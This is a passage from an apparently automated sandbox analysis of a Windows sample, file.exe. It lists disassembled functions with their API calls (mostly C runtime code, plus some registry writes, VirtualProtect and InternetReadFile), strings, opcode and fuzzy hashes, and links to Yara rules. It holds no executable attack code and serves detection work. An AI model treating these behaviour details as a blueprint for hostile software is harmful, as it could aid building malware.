Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244

Function 04A2BC2B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,04A2BC22,04A2B1C6,04A2A9D7), ref: 04A2BC39
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04A2BC47
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04A2BC60
SetLastError.KERNEL32(00000000,04A2BC22,04A2B1C6,04A2A9D7), ref: 04A2BCB2

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
Instruction ID: 79075d279892fb6186a496958bb2414587539824ff4ec1ff8c0941cc35821ee6
Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
Instruction Fuzzy Hash: 1B01B1322096319FB7352FBDAFC4A6F2B54EB4967C320423AE524961E1EE51784271A4

Function 00401600 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00401605

Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,0042D884,?,?,?,0042D954,0042D955), ref: 0040163B
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,0042D884,?,?,?,0042D954,0042D955), ref: 00401672
Concurrency::cancel_current_task.LIBCPMT ref: 00401787

Strings

string too long, xrefs: 00401600

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 2123813255-2556327735
Opcode ID: dbd3adb8b6484afca22dc8571a418de7f2fa8100bdd3f65c95f6337441c4357a
Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
Opcode Fuzzy Hash: dbd3adb8b6484afca22dc8571a418de7f2fa8100bdd3f65c95f6337441c4357a
Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9

Function 004058F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122registrysleepCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
Sleep.KERNEL32(000003E8), ref: 00405AB0

Strings

mixone, xrefs: 00406239

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenSleepValue
String ID: mixone
API String ID: 4111408922-3123478411
Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58

Function 10008336 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 1000833B

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe
API String ID: 0-4010620828
Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0

Function 004105C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A5E27AAC,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629

Strings

mscoree.dll, xrefs: 004105EE
CorExitProcess, xrefs: 004105FF

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C

Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5

Strings

CorExitProcess, xrefs: 10005FCA
mscoree.dll, xrefs: 10005FB8

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90

Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
__alloca_probe_16.LIBCMT ref: 1000A736
__alloca_probe_16.LIBCMT ref: 1000A7CC
__freea.LIBCMT ref: 1000A837
__freea.LIBCMT ref: 1000A843

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0

Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 1000B03B
__alloca_probe_16.LIBCMT ref: 1000B101
__freea.LIBCMT ref: 1000B16D

Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20

__freea.LIBCMT ref: 1000B176
__freea.LIBCMT ref: 1000B199

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0

Function 00415050 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 004150D5
__alloca_probe_16.LIBCMT ref: 0041519E
__freea.LIBCMT ref: 00415205

Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,0042D884,?,?,004035B7,?,?,5(@), ref: 00413CEB

__freea.LIBCMT ref: 00415218
__freea.LIBCMT ref: 00415225

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8

Function 04A22CB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 04A22D5F
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04A22D74
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04A22D82
LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04A22D9D
OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04A22DBC

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
String ID:
API String ID: 2509773233-0
Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
Instruction ID: 1df3475cb61be45dd1184fbed70f877d6bf5417ae0183896bd9fa6c1ea603818
Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
Instruction Fuzzy Hash: D6311472B00014AFDB149F6CDD40FAAB7B8EF48704F5541E9E905EB2A2DB31AD06DB94

Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 100029C3
dllmain_crt_dispatch.LIBCMT ref: 100029DA
dllmain_raw.LIBCMT ref: 10002A22
dllmain_crt_dispatch.LIBCMT ref: 10002A35
dllmain_raw.LIBCMT ref: 10002A48

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1

Function 1000C51E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 1000C536

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 1000C548
_free.LIBCMT ref: 1000C55A
_free.LIBCMT ref: 1000C56C
_free.LIBCMT ref: 1000C57E

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4

Function 10007CBA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 10007E54

Strings

*?, xrefs: 10007CFD

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90

Function 0040CAD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16

Strings

api-ms-, xrefs: 0040CAFB

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548

Function 10004F12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51

Strings

api-ms-, xrefs: 10004F36

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9

Function 004196CC Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(A5E27AAC,00000000,00000000,00000000), ref: 0041972F

Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
GetLastError.KERNEL32 ref: 00419A6A

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54

Function 04A39933 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04A39996

Part of subcall function 04A351FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04A35462,?,00000000,-00000008), ref: 04A35260

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04A39BE8
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04A39C2E
GetLastError.KERNEL32 ref: 04A39CD1

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
Instruction ID: ecbbdd95b1e3dd1f7af09e668ee5edc1c5c90c5f3ac95156077cc68744aa31ef
Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
Instruction Fuzzy Hash: 4FD17DB5E002589FDB14CFE8C9809EEBBF8FF48705F14456AE456EB351E670A942CB50

Function 04A21BD7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON

Download Yara Rule

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04A21C6C
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04A21C8F

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID:
API String ID: 3197321146-0
Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
Instruction ID: b85ddeceb1b9303cfb968e3ed77afe6eb8878bc249464fe134408fb04cb86347
Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
Instruction Fuzzy Hash: 08C15AB1A002289FEB24CF58CE84BE9B7B4BF49304F1041D9E809A7290D771BE94DF91

Function 0040BAA4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040BB6B
___AdjustPointer.LIBCMT ref: 0040BB8E
___AdjustPointer.LIBCMT ref: 0040BC2A

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD

Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 10003FA1
___AdjustPointer.LIBCMT ref: 10003FC4
___AdjustPointer.LIBCMT ref: 10004060

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794

Function 04A2BD0B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 04A2BDD2
___AdjustPointer.LIBCMT ref: 04A2BDF5
___AdjustPointer.LIBCMT ref: 04A2BE91

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
